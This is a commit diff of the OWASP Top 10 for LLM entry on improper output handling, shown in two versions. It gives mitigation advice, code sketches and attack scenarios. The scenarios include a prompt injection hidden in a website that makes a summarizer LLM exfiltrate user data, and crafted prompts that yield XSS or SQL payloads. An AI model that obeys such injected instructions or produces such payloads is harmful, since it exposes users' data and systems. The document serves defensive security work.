Update LLM05_ImproperOutputHandling.md
Signed-off-by: DistributedApps.AI <[email protected]>
1 parent 7b14a03 · commit d07c00f
Showing 1 changed file with 64 additions and 58 deletions.
2_0_vulns/translations/zh-CN/LLM05_ImproperOutputHandling.md
@@ -1,59 +1,65 @@
## LLM05:2025 Improper Output Handling

### Description

Improper Output Handling refers specifically to insufficient validation, sanitization, and handling of the outputs generated by large language models before they are passed downstream to other components and systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality.
Improper Output Handling differs from Overreliance in that it deals with LLM-generated outputs before they are passed downstream, whereas Overreliance focuses on broader concerns around overdependence on the accuracy and appropriateness of LLM outputs.
Successful exploitation of an Improper Output Handling vulnerability can result in XSS and CSRF in web browsers, as well as SSRF, privilege escalation, or remote code execution on backend systems.
The following conditions can increase the impact of this vulnerability:
- The application grants the LLM privileges beyond what is intended for end users, enabling escalation of privileges or remote code execution.
- The application is vulnerable to indirect prompt injection attacks, which could allow an attacker to gain privileged access to a target user's environment.
- Third-party extensions do not adequately validate inputs.
- Lack of proper output encoding for different contexts (e.g., HTML, JavaScript, SQL).
- Insufficient monitoring and logging of LLM outputs.
- Absence of rate limiting or anomaly detection for LLM usage.

### Common Examples of Vulnerability

1. LLM output is entered directly into a system shell or a similar function such as `exec` or `eval`, resulting in remote code execution (see the sketch after this list).
2. JavaScript or Markdown is generated by the LLM and returned to a user. The code is then interpreted by the browser, resulting in XSS.
3. LLM-generated SQL queries are executed without proper parameterization, leading to SQL injection.
4. LLM output is used to construct file paths without proper sanitization, potentially resulting in path traversal vulnerabilities.
5. LLM-generated content is used in email templates without proper escaping, potentially leading to phishing attacks.

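The first example is the most direct to demonstrate. Below is a minimal Python sketch of the anti-pattern and one safer alternative; the JSON schema and the action names are illustrative assumptions, not something specified by this document:

```python
import json

def risky_dispatch(llm_output: str):
    # Anti-pattern: the model's text is executed verbatim, so a prompt-injected
    # payload such as "__import__('os').system(...)" runs with app privileges.
    return eval(llm_output)  # shown only to illustrate the flaw

ALLOWED_ACTIONS = {"get_weather", "get_time"}  # hypothetical allow-list

def safe_dispatch(llm_output: str):
    # Safer pattern: treat the output as untrusted data, not code. Parse it as
    # JSON and dispatch only to an allow-listed action name.
    request = json.loads(llm_output)  # raises ValueError on non-JSON text
    action = request.get("action")
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"action not permitted: {action!r}")
    return action, request.get("arguments", {})

print(safe_dispatch('{"action": "get_time", "arguments": {}}'))
```

The essential shift is to treat model output as untrusted data to be parsed and checked against an allow-list, never as code to execute.
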
### Prevention and Mitigation Strategies

1. Treat the model as any other user, adopting a zero-trust approach, and apply proper input validation on responses coming from the model to backend functions.
2. Follow the OWASP ASVS (Application Security Verification Standard) guidelines to ensure effective input validation and sanitization.
3. Encode model output back to users to mitigate undesired code execution by JavaScript or Markdown. OWASP ASVS provides detailed guidance on output encoding.
4. Implement context-aware output encoding based on where the LLM output will be used (e.g., HTML encoding for web content, SQL escaping for database queries), as sketched after this list.
5. Use parameterized queries or prepared statements for all database operations involving LLM output.
6. Employ a strict Content Security Policy (CSP) to mitigate the risk of XSS attacks from LLM-generated content.
7. Implement robust logging and monitoring systems to detect unusual patterns in LLM outputs that might indicate exploitation attempts.

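As a rough illustration of strategies 4 and 5, the sketch below uses only the Python standard library; the hostile sample payload is invented for the demonstration:

```python
import html
import sqlite3

llm_output = "Robert'); DROP TABLE students;-- <script>alert(1)</script>"

# HTML context: encode before rendering so markup in the model's text is inert.
safe_html = html.escape(llm_output)

# SQL context: never splice model text into the statement; bind it as a parameter
# so the database driver treats it purely as a value.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE notes (body TEXT)")
conn.execute("INSERT INTO notes (body) VALUES (?)", (llm_output,))

print(safe_html)
print(conn.execute("SELECT body FROM notes").fetchone()[0])
```

Each sink gets its own encoding: what neutralizes the payload for an HTML page does nothing for the database, and vice versa.
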
### Example Attack Scenarios

#### Scenario #1
An application utilizes an LLM extension to generate responses for a chatbot feature. The extension also offers a number of administrative functions accessible to another, privileged LLM. The general-purpose LLM passes its response directly to the extension without proper output validation, causing the extension to shut down for maintenance.
#### Scenario #2
A user utilizes a website summarizer tool powered by an LLM to generate a concise summary of an article. The website includes a prompt injection instructing the LLM to capture sensitive content from either the website or the user's conversation. From there the LLM can encode the sensitive data and send it, without any output validation or filtering, to an attacker-controlled server.
#### Scenario #3
An LLM allows users to craft SQL queries for a backend database through a chat-like feature. A user requests a query to delete all database tables. If the crafted query from the LLM is not scrutinized, all database tables will be deleted.
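
One hedged sketch of such scrutiny is a deliberately crude gate that refuses anything but a single `SELECT` before the text reaches the database; real deployments would pair this with a read-only database role:

```python
import sqlite3

def run_readonly(conn: sqlite3.Connection, generated_sql: str):
    # Reject multi-statement input and anything that is not a SELECT.
    statement = generated_sql.strip().rstrip(";")
    if ";" in statement or not statement.lower().startswith("select"):
        raise PermissionError("only single SELECT statements are allowed")
    return conn.execute(statement).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE t (x INTEGER)")
print(run_readonly(conn, "SELECT x FROM t"))   # allowed, returns []
# run_readonly(conn, "DROP TABLE t")           # raises PermissionError
```
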
#### Scenario #4
A web app uses an LLM to generate content from user text prompts without output sanitization. An attacker could submit a crafted prompt causing the LLM to return an unsanitized JavaScript payload, leading to XSS when rendered in a victim's browser. Insufficient validation of prompts enabled this attack.
#### Scenario #5
An LLM is used to generate dynamic email templates for a marketing campaign. An attacker manipulates the LLM to include malicious JavaScript within the email content. If the application doesn't properly sanitize the LLM output, this could lead to XSS attacks on recipients who view the email in vulnerable email clients.
#### Scenario #6
An LLM is used to generate code from natural language inputs in a software company, aiming to streamline development tasks. While efficient, this approach risks exposing sensitive information, creating insecure data handling methods, or introducing vulnerabilities like SQL injection. The AI may also hallucinate non-existent software packages, potentially leading developers to download malware-infected resources. Thorough code review and verification of suggested packages are crucial to prevent security breaches, unauthorized access, and system compromises.

### Reference Links

1. [Proof Pudding (CVE-2019-20634)](https://avidml.org/database/avid-2023-v009/): **AVID** (`moohax` & `monoxgas`)
2. [Arbitrary Code Execution](https://security.snyk.io/vuln/SNYK-PYTHON-LANGCHAIN-5411357): **Snyk Security Blog**
3. [ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data](https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./): **Embrace The Red**
4. [New prompt injection attack on ChatGPT web version. Markdown images can steal your chat data.](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2?gi=8daec85e2116): **System Weakness**
5. [Don't blindly trust LLM responses. Threats to chatbots](https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/): **Embrace The Red**
6. [Threat Modeling LLM Applications](https://aivillage.org/large%20language%20models/threat-modeling-llm/): **AI Village**
7. [OWASP ASVS - 5 Validation, Sanitization and Encoding](https://owasp-aasvs4.readthedocs.io/en/latest/V5.html#validation-sanitization-and-encoding): **OWASP ASVS**
8. [AI hallucinates software packages and devs download them – even if potentially poisoned with malware](https://www.theregister.com/2024/03/28/ai_bots_hallucinate_software_packages/): **The Register**
### LLM05:2025 Improper Output Handling

#### Description

Improper Output Handling refers to insufficient validation, sanitization, or handling of the outputs generated by a large language model (LLM) before they are passed to other components and systems. Because LLM-generated content can be controlled by prompt input, this behavior is similar to giving users indirect access to additional functionality.

Unlike Overreliance, Improper Output Handling concerns the validation and sanitization of LLM-generated outputs before they are passed to downstream systems, whereas Overreliance concerns dependence on the accuracy and appropriateness of LLM outputs. Successful exploitation of an Improper Output Handling vulnerability can lead to cross-site scripting (XSS) and cross-site request forgery (CSRF) in the browser, as well as server-side request forgery (SSRF), privilege escalation, or remote code execution on backend systems.

The following conditions can increase the impact of this vulnerability:

- The application grants the LLM privileges beyond what users are expected to have, enabling privilege escalation or remote code execution.
- The application is vulnerable to indirect prompt injection attacks, allowing an attacker to gain privileged access to the target user's environment.
- Third-party extensions do not adequately validate inputs.
- Lack of proper output encoding for different contexts (e.g., HTML, JavaScript, SQL).
- Insufficient monitoring and logging of LLM outputs.
- Absence of rate limiting or anomaly detection for LLM usage.

#### Common Examples of Vulnerability

1. LLM output is fed directly into a system shell or a similar function such as `exec` or `eval`, resulting in remote code execution.
2. The LLM generates JavaScript or Markdown code and returns it to the user; the browser interprets the code, triggering an XSS attack.
3. LLM-generated SQL queries are executed without parameterized queries, leading to SQL injection.
4. LLM output is used to construct file paths; without proper sanitization this can lead to path traversal vulnerabilities (see the sketch after this list).
5. LLM-generated content is used in email templates; without proper escaping this can lead to phishing attacks.

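A minimal sketch of the path-traversal check from example 4, assuming a hypothetical storage root; note that `Path.is_relative_to` requires Python 3.9 or later:

```python
from pathlib import Path

BASE_DIR = Path("/srv/app/attachments").resolve()  # assumed storage root

def resolve_safely(llm_supplied_name: str) -> Path:
    # Resolve the candidate path and require it to stay inside BASE_DIR,
    # which defeats "../../etc/passwd"-style traversal in model output.
    candidate = (BASE_DIR / llm_supplied_name).resolve()
    if not candidate.is_relative_to(BASE_DIR):
        raise ValueError(f"path escapes storage root: {llm_supplied_name!r}")
    return candidate

print(resolve_safely("report.txt"))
# resolve_safely("../../etc/passwd")  # raises ValueError
```
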
#### Prevention and Mitigation Strategies

1. Treat the model like any other user, adopting a zero-trust approach, and apply proper input validation to responses returned by the model.
2. Follow the OWASP ASVS (Application Security Verification Standard) guidelines to ensure effective input validation and sanitization.
3. Encode model output returned to users to prevent unintended code execution via JavaScript or Markdown. OWASP ASVS provides detailed output-encoding guidance.
4. Apply context-aware output encoding based on where the LLM output will be used (e.g., HTML encoding for web content, SQL escaping for database queries).
5. Use parameterized queries or prepared statements for all database operations involving LLM output.
6. Enforce a strict Content Security Policy (CSP) to reduce the risk of XSS attacks arising from LLM-generated content (see the sketch after this list).
7. Deploy robust logging and monitoring systems to detect anomalous patterns in LLM outputs and guard against potential exploitation attempts.

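As a sketch of strategy 6, the snippet below attaches a CSP header to every response, assuming a Flask application; the framework choice and the policy string are illustrative starting points, not prescribed by this document:

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def add_csp(response):
    # Disallow inline scripts so that script tags smuggled into LLM-generated
    # HTML are not executed even if they reach the rendered page.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self'; object-src 'none'"
    )
    return response

@app.route("/")
def index():
    return "<p>LLM-generated content would be rendered here.</p>"

if __name__ == "__main__":
    app.run()
```
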
#### Example Attack Scenarios

##### Scenario #1
An application uses an LLM extension to generate responses for a chatbot feature. The extension also exposes administrative functions to a privileged LLM. The general-purpose LLM passes its response directly to the extension without proper output validation, causing the extension to unexpectedly enter maintenance mode.

##### Scenario #2
A user employs an LLM-powered website summarizer to generate a summary of an article. The website embeds a prompt injection instructing the LLM to capture sensitive data and send it to an attacker-controlled server; the lack of output validation and filtering allows the data to leak.

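One possible output filter for this scenario strips Markdown images whose URLs fall outside an allow-list, since auto-fetched image URLs are a common exfiltration channel (see reference 4 below); the allow-listed host here is hypothetical:

```python
import re

# Markdown image syntax ![alt](url) can be abused to exfiltrate data: the model
# embeds secrets in the URL and the client fetches it automatically on render.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(\s*(?P<url>[^)\s]+)[^)]*\)")

ALLOWED_HOSTS = ("https://cdn.example.com/",)  # hypothetical allow-list

def strip_untrusted_images(markdown: str) -> str:
    def check(match: re.Match) -> str:
        url = match.group("url")
        return match.group(0) if url.startswith(ALLOWED_HOSTS) else "[image removed]"
    return IMAGE_PATTERN.sub(check, markdown)

print(strip_untrusted_images("See ![x](https://attacker.test/?q=SECRET) here"))
# -> "See [image removed] here"
```
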
##### Scenario #3
An LLM lets users craft SQL queries against a backend database through a chat-like feature. A user requests a query that deletes all tables. If the query generated by the LLM is not scrutinized, the database tables will be deleted.

##### Scenario #4
A web application uses an LLM to generate content from user text prompts without sanitizing the output. An attacker submits a crafted prompt that makes the LLM return an unsanitized JavaScript payload, resulting in an XSS attack executed in the victim's browser.

##### Scenario #5
An LLM is used to generate dynamic email templates for a marketing campaign. An attacker manipulates the LLM into embedding malicious JavaScript in the email content. If the application does not properly sanitize the LLM output, this can lead to XSS attacks in vulnerable email clients.

##### Scenario #6
A software company uses an LLM to generate code from natural-language input in order to streamline development tasks. Efficient as this approach is, it risks exposing sensitive information, creating insecure data-handling methods, or introducing vulnerabilities such as SQL injection. The AI may also hallucinate non-existent software packages, potentially leading developers to download resources laced with malicious code.

#### Reference Links

1. [Proof Pudding (CVE-2019-20634)](https://avidml.org/database/avid-2023-v009/): **AVID** (`moohax` & `monoxgas`)
2. [Arbitrary Code Execution](https://security.snyk.io/vuln/SNYK-PYTHON-LANGCHAIN-5411357): **Snyk Security Blog**
3. [ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data](https://embracethered.com/blog/posts/2023/chatgpt-cross-plugin-request-forgery-and-prompt-injection./): **Embrace The Red**
4. [New prompt injection attack on ChatGPT web version: Markdown images can steal your chat data](https://systemweakness.com/new-prompt-injection-attack-on-chatgpt-web-version-ef717492c5c2?gi=8daec85e2116): **System Weakness**
5. [Don't blindly trust LLM responses: threats to chatbots](https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/): **Embrace The Red**
6. [Threat Modeling LLM Applications](https://aivillage.org/large%20language%20models/threat-modeling-llm/): **AI Village**
7. [OWASP ASVS - 5 Validation, Sanitization and Encoding](https://owasp-aasvs4.readthedocs.io/en/latest/V5.html#validation-sanitization-and-encoding): **OWASP ASVS**
8. [AI hallucinates software packages and devs download them – even if potentially poisoned with malware](https://www.theregister.com/2024/03/28/ai_bots_hallucinate_software_packages/): **The Register**